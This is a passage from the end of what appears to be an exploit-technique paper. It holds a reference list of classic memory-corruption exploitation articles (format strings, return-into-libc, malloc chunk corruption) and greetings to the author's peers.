[http://www.w00w00.org/files/articles/heaptut.txt]
[5] some interesting pdfs about computer architectures
[http://www.segfault.net/~scut/cpu]
[6] Scut
Exploiting Format String vulnerabilities
[http://www.team-teso.net/releases/formatstring-1.2.tar.gz]
[7] Horizon
Return into libc exploits on Sparc/Solaris
[http://packetstormsecurity.nl/groups/horizon/stack.txt]
[8] Maxx
Exploiting dynamic heap overflows via malloc chunk corruption.
[http://www.phrack.org/phrack/57/p57-0x08]
[9] Exploiting dynamic heap overflows via malloc chunk corruption.
[http://www.phrack.org/phrack/57/p57-0x09]
----/ 8 - Greetings
- Big thx to Scut for reviewing the paper
- Svoern for mental support
- all the other UNF fellows